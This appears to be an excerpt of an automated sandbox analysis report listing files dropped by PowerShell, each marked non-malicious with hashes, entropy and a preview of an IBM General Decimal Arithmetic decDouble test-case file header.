                                                                                                                                                                                                                      SHA-512:9A51BB72F35DCA92E03E778772DE04D789C3FBBFDE2374B8DC5D8EF53356F816FB8E7FAE2650B0E1BFF3C6AD061AC4255DB7806F24E54F77E7831E61C4DD3A53
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddInvert.decTest -- digitwise logical INVERT for decDoubles --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6240
                                                                                                                                                                                                                      Entropy (8bit):4.3446600584641315
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LdoBkGiQHdaVA9QmmqodzKfICzDtg1UBT+/9ebfXL9x7FQNW0:QkoQA/odz2ICW1UV+lWju
                                                                                                                                                                                                                      MD5:949CAEF4730C687D6A984D44D818C8E1
                                                                                                                                                                                                                      SHA1:6207187BF8A01AB0AF2C25A65CE74F68DA40D782
                                                                                                                                                                                                                      SHA-256:9117453204628442809D951B1432F941F776F944328A3CF4335CFE5E8142C4E3
                                                                                                                                                                                                                      SHA-512:56A323ED8E16CCD24BD7F6A39300CC03B471961B6E4255EA9FAEAF74DE911B09CA39D3BEF3961A88F885DB4731893477840BF2BFCA92DE20A12351975F643F63
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddLogB.decTest -- integral 754r adjusted exponent, for decDoubles --..-- Copyright (c) IBM Corporation, 2005, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12314
                                                                                                                                                                                                                      Entropy (8bit):4.323156089145602
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:BkogfM+h9YenIJ2d6QIJ66tJ66y6vcqgoCs0awXRgZaSlIljt:slbqH6b
                                                                                                                                                                                                                      MD5:022E7CB9EF43FD3839CE2FC24FAEB1D4
                                                                                                                                                                                                                      SHA1:3ED9E9ED370A063888CC3B9B0633610E427423C2
                                                                                                                                                                                                                      SHA-256:63A5FA620A031BD89779B7CE19E055BEC495D5E72BF1D24BDD811B80469D1551
                                                                                                                                                                                                                      SHA-512:42D38C5B0044D34B642914508B7E4C42618B1BD7BC5EEEA224E74C2EA917199D2C101EACBADB569DF6E8A7DDBACD2252A1FB312CCE8B227C4A54A8396880A5EF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddMax.decTest -- decDouble maxnum --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12743
                                                                                                                                                                                                                      Entropy (8bit):4.459535975938126
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:NkoRyf3H7QKibjYRwBLNzT6wra0dB5AtN30LBQtBynF+eWKxjJVqA/xDgGO:oEPMwZNzui54EUcqKMKgGO
                                                                                                                                                                                                                      MD5:AF3F17EF6F7D64302DF85E5843C0EEB0
                                                                                                                                                                                                                      SHA1:76EC9FF99FF50A278B89C8F7B3CC89CAD0AE7A0A
                                                                                                                                                                                                                      SHA-256:AA11DF94289E2E84623511C4D46F5F0B58AE0AF831BAE0B396019CFEA86D3EBD
                                                                                                                                                                                                                      SHA-512:BBA542941C05A207872C8D5A7A4A674D905D70DDD5EEDD90EE87DDC07C6555D010478906C336F21649FF91B1A5EBC5AB0CC26BC3D08629CEEC525BE7C395B6C4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddMaxMag.decTest -- decDouble maxnummag --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11969
                                                                                                                                                                                                                      Entropy (8bit):4.297360695912787
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:tko8/k3mYT3g2Q1qS5rxhtGCQ1VNepc4AP2dIxCLGhPK5javX2sdR:/w44PGuTksyblR
                                                                                                                                                                                                                      MD5:DC1914FEABE09DECA60D6CEED4A1F8C4
                                                                                                                                                                                                                      SHA1:4C904C7B1D994B7F49A7486B6D9E8185D7668871
                                                                                                                                                                                                                      SHA-256:082B60C5314086FB2B8668587F6818E6A6A6783E1A54CC7F3A43239C102E5676
                                                                                                                                                                                                                      SHA-512:3F05F2BE3C335957F6A493C0335E2CB7C8259AACA608D91C1EA4863FE2EBB4333178819C1177AD1665A93652C0E35CDDC4E01A2151723E83CE84F1B6BD295A74
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddMin.decTest -- decDouble minnum --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11625
                                                                                                                                                                                                                      Entropy (8bit):4.328812238159796
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:Nko5X4BcD/TALr9jSCuXU0HNLI/QB5Gtkkcbtf:9nhSkf
                                                                                                                                                                                                                      MD5:5626881A280AC575B50CDF658145AF1F
                                                                                                                                                                                                                      SHA1:1535522CF52663455E5CCBC62AF3EAE57056B9D0
                                                                                                                                                                                                                      SHA-256:11F5843D17CAF7FC134881D94A2BCE6BB3A1FEBFEE646FFD0CF98BBEEB68D0E5
                                                                                                                                                                                                                      SHA-512:0C40E1EEFF30BDAFE01722B6862FEBE75DE24FE4454BC8FBEB7A4C6F7035A37A5D097C5A0E2DDA7189D579A2B30B93B7FBD418BF51E211571345E2A293A05590
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddMinMag.decTest -- decDouble minnummag --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3790
                                                                                                                                                                                                                      Entropy (8bit):4.442982968156025
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LdoBkGiQHdaYLbVmsuaEuUAi8ABFFyFFBFF9FFG7:AkohbVmsua0Ai8ABFFyFFBFF9FFG7
                                                                                                                                                                                                                      MD5:CAC9E9DB7F91F5F9B32482718E774273
                                                                                                                                                                                                                      SHA1:6CBC370E61CED30040C482699887FE81B5B43845
                                                                                                                                                                                                                      SHA-256:8131E73494A1371F4D173AA5CA53EB3733B198FE48B1B39279CD0DDFB03590DB
                                                                                                                                                                                                                      SHA-512:E8367AE9DE40766D95DA3AF62BD33D1F7CC65532E9421664626E3CB4F0A64008B40328E7A31DCD1D28AFE4BB694DBF2DBD5A63EC67E69B5AA00105552E41C2EC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddMinus.decTest -- decDouble 0-x --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):29304
                                                                                                                                                                                                                      Entropy (8bit):4.584292667483526
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:3lkoaFL8ErlqNIxq3WNFjbfxcwnFe/hXAvzH+tfl3UPinj/wXRvOHvCrU9VsHubp:YlIKJmOZKzfiVQv
                                                                                                                                                                                                                      MD5:FCD79CEF358C61C04EBF2AE2941F597B
                                                                                                                                                                                                                      SHA1:21F0A03C4C4F7869D344E419454724D9707AF3A1
                                                                                                                                                                                                                      SHA-256:793BB12817267238F230B36B020C1227E76E71A6830BABA170878A44F70DCE4F
                                                                                                                                                                                                                      SHA-512:D0F9E31F62510A0C83E9956BD4BAB92E9B97C2B859A93F1A7D287C1348E52EDA73CEB1CBDF4951022ECC86BEA829707290B1D675E0CF4AFBE54D1F05A35FC3EF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddMultiply.decTest -- decDouble multiplication --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6827
                                                                                                                                                                                                                      Entropy (8bit):4.335056141554704
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:LZAqLRH/AQqBKGiQwedyvqyaFkv3+8REhPokebwHSmx3ElXABTyZR+MO2g9:LZZ1oBkGiQHdao3yXa/2Y
                                                                                                                                                                                                                      MD5:DF3003CB05D88F9327956F788C5E0EBD
                                                                                                                                                                                                                      SHA1:E451E3373A3B61AB58C615507977EF486C5888D6
                                                                                                                                                                                                                      SHA-256:6C573F45C63DF49A72F71D3553495E525FAEE06AEDCF86D09C0B195D9201297B
                                                                                                                                                                                                                      SHA-512:223AC4576928F369C1B68648D063C52B27EEFE1BD8435DD886C2D5B4CB132A92FB0C9D72F1001F3E25574E42C5F34221B926A93FE8AF90BA720CD9FB866DA8F8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddNextMinus.decTest -- decDouble next that is less [754r nextdown] --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6723
                                                                                                                                                                                                                      Entropy (8bit):4.330975817183441
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:KkoHSFoKbuD08fkYCZ0+KizotAnG0A8ZLaYS1OCOPMcCKaeEJ2gUOmQj3eQ1:oSFoKbuD08fkYCZ07izotAnG0A8ZLaYk
                                                                                                                                                                                                                      MD5:195B8B20EE3FCD3C42346F2CCB8E6C3C
                                                                                                                                                                                                                      SHA1:0598FE10A66F8D1CEC0DC5FDE9CBB31DD08987A3
                                                                                                                                                                                                                      SHA-256:8B899B53C8E3C2201D27D2EAEE0A900E107C86379D1FE74D161AC89AACDA7598
                                                                                                                                                                                                                      SHA-512:70C913841382B69DA4F1A61C8B41E075523749C92732441F5F9BB85E2501CBFBADF3E6E4A73287FA68A9EA30FE027AB9C636F5813A958F95AFD3E3310ED21308
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddNextPlus.decTest -- decDouble next that is greater [754r nextup] --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):24990
                                                                                                                                                                                                                      Entropy (8bit):4.515876417085465
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9ko4wqIaxz25YBy/UvB24vbtUFYrnkTo5AHCZifw3fEkEjBPrGtopSTXBXAXaX/Q:K25YBy/UvB24Q6ywffys5U
                                                                                                                                                                                                                      MD5:71C5AF0D507909AB3038122F339786AA
                                                                                                                                                                                                                      SHA1:3887F279CAE82AA54A039830717B2A878AF55F1E
                                                                                                                                                                                                                      SHA-256:4A33114001D531B601D932959D05B8EC17A31F9D541A9A7670B1580967E04517
                                                                                                                                                                                                                      SHA-512:3B15775DA95DFC29F87D96819FB0EA2CD7C18A0F43AB912B2A79D25E5BFE955394E984E9FBF8F15A1FFAC8B1A8EA9F96440A37B89B7B3B7F32E7F79F51226F6D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddNextToward.decTest -- decDouble next toward rhs [754r nextafter] --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):16023
                                                                                                                                                                                                                      Entropy (8bit):4.251029566744131
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:zkoQSQzxOjkWnglRj8/x8SF5l4+df4mEO:F1FH4UfV
                                                                                                                                                                                                                      MD5:A2D625FAB285BBD0A34437117E7E23F7
                                                                                                                                                                                                                      SHA1:5C1C2F5D29C7FCAF1423021289956C9D99AED10B
                                                                                                                                                                                                                      SHA-256:AAD11875A134606BEC01C6B06A956D6CDBAF5E661F05D4D6E8659CEAE44A0618
                                                                                                                                                                                                                      SHA-512:37DA9E991EBB6FAF8FFF915845AF4D57EF1486339FF07E937D04CB9D7B026E2419FE4959877266B0870F8307FEF5C16ED6E536A4F8BDAE6D2C90A2DEABD7AD24
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddOr.decTest -- digitwise logical OR for decDoubles --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3746
                                                                                                                                                                                                                      Entropy (8bit):4.4501179692101545
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:LxlPH/AQqBKGiQwedyvqYvhvVnF29v9hJ1vnZJFFZFFYFFGFF5YTv:LboBkGiQHda/F+LvnZJFFZFFYFFGFFQv
                                                                                                                                                                                                                      MD5:0A7FB0DC3ECDF736239CB868F981336E
                                                                                                                                                                                                                      SHA1:D00008AF28EBEEB888ACA6D507E1C17297F9F5C4
                                                                                                                                                                                                                      SHA-256:F36C06011731342F56F139CB2DC13FB7377A5CA76053E25E201EAC9D7F348364
                                                                                                                                                                                                                      SHA-512:CC1D0033D9684A96E5E70A2C5EEFF7369424DD74540D4AFF50752FD861154E9D19D3955BB33CCDEAE1E900062093689624073BEB94384C12254BE2172FA635EF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddPlus.decTest -- decDouble 0+x --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):42493
                                                                                                                                                                                                                      Entropy (8bit):4.6311388094579815
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:I6n/zNMuk3l8dg1agUK3Db/uScKA6i6MFrv0uTkTsUfupu4j3pP8agvjdxia8wkd:ICMukCdg8gUK3H/uScKA6i6MFrv0uTk0
                                                                                                                                                                                                                      MD5:B337E68AE571AC2C859027E90903AB16
                                                                                                                                                                                                                      SHA1:FA43405596BF65C6254A1F280D668E2D5465674C
                                                                                                                                                                                                                      SHA-256:A027E4F2E2AD3AFF90F82849872F07B31BC1A0370164BBF5F6370E2E9F1176CF
                                                                                                                                                                                                                      SHA-512:0F635790BF050620C966D7230E434E726A397918E6B7619A71223BF3CFBE3B0B5A2EDFDF1AFA20FBF77D2D18E78504D968131E7F6F29C00D05AE3F632B3A0566
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddQuantize.decTest -- decDouble quantize operation --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7460
                                                                                                                                                                                                                      Entropy (8bit):4.416887640532855
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LuARwoBkGiQHdaVLc2y5toepsMYTUuMAPTv3kkpnsFl8Bdn:vLkoQLqiMYpTcSsFl8BB
                                                                                                                                                                                                                      MD5:D757A9938366456FC87F8A0A03D7C69C
                                                                                                                                                                                                                      SHA1:1FD3B08F7EB3DE554A616B2F6C2AC78FAA6BF06F
                                                                                                                                                                                                                      SHA-256:2CBBCB94C168F5C88CC677715A57E2D1E8ADB9E9C75E5CA539B5AEE06047CDA5
                                                                                                                                                                                                                      SHA-512:ECD668FB0F6417C7751BCD33F3702268937731A1253BF014CE4AB1ABD3C145D688A459B38A032BC9F500CA6B414B97FF6273240AC766E184E74FBE190372D3E1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddReduce.decTest -- remove trailing zeros from a decDouble --..-- Copyright (c) IBM Corporation, 2003, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):26987
                                                                                                                                                                                                                      Entropy (8bit):4.332840361858835
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:PkoQwTOR8cx0j8yelJBO65Xyhjh4pf+FnidqI+1tvQ:JTORjx0j8ya5Xyhjh4pWFidqI+1G
                                                                                                                                                                                                                      MD5:0BBF904C18130C21256011492ED2BB92
                                                                                                                                                                                                                      SHA1:1117027E8F4FD78E116902551CACCE6F136CA263
                                                                                                                                                                                                                      SHA-256:77F069AB2042DCFB4A0391CC37ED702C23C9B77EDC1F50CC859C5FA86BE7C6C0
                                                                                                                                                                                                                      SHA-512:84959957248703A89BC63E1724AF9B3706CF6C5AA708887647AC32F44E2182CA2C177D8421596109B799A33F3D419E007182DC52A3028A7923AE1AA1E30263BA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddRemainder.decTest -- decDouble remainder --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):30259
                                                                                                                                                                                                                      Entropy (8bit):4.33410929105048
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:qcapldEBusEEGAIWM0KDEOQY5lTmKcg+Qq:qc6uosyA7YTKgg
                                                                                                                                                                                                                      MD5:0F629AEEF2E039D2C47471F66115137D
                                                                                                                                                                                                                      SHA1:45EFCA44E64D22316E2F7394CF6E9F28E0EA94A5
                                                                                                                                                                                                                      SHA-256:CEFBE40302E21228689A46E89918FC129E9BAF571EB115D2B4717FBF00AE7709
                                                                                                                                                                                                                      SHA-512:5329CDE4DDC2B756D586ECD231BA2D1D3E5EE1B9D38676C13783AD290E71602ABA1AC64B0D5CF3B913171AA6AF04D027C97936C20472DB6671E2C59ED675AF43
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddRemainderNear.decTest -- decDouble remainder-near --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14082
                                                                                                                                                                                                                      Entropy (8bit):4.407376961044858
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:rkoQ0tR9XHXgjkvg38GzJ1p5zfGB4SoPzWNkE20dult7:13XHXgjkxdQ
                                                                                                                                                                                                                      MD5:D45BB60B878101B4E5B8417E7183CF40
                                                                                                                                                                                                                      SHA1:A5D9C1CB1039898299236E90B01AE3FE916B6E42
                                                                                                                                                                                                                      SHA-256:3052CF58C95B5EC36671EE9E13C9AA598CAA4C5794EE7588E5760750DFEA06EB
                                                                                                                                                                                                                      SHA-512:D0A53205D7BD0670A75BBBF2E0B6AF44140C464B5D5830A5B9D46D7F464D2DDAC85B007246EAAD67A8C63EE8EADC1E095E3A999159847FD6A1942E980FDB1138
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddRotate.decTest -- rotate a decDouble coefficient left or right --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):17541
                                                                                                                                                                                                                      Entropy (8bit):4.24374767334365
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LXioBkGiQHda/jx+F4YQjwV5QVWQmNZzGSvsI1iC5EbhYTjGdMM/2XupqQFk+2rc:9kosk4YQjo5IWQmNZ+aNK+ul/z
                                                                                                                                                                                                                      MD5:CA21AF638E7B20E8CF8B39418A0A643E
                                                                                                                                                                                                                      SHA1:EF13219A57CC351F949596FA78A46F4E2ABC6C52
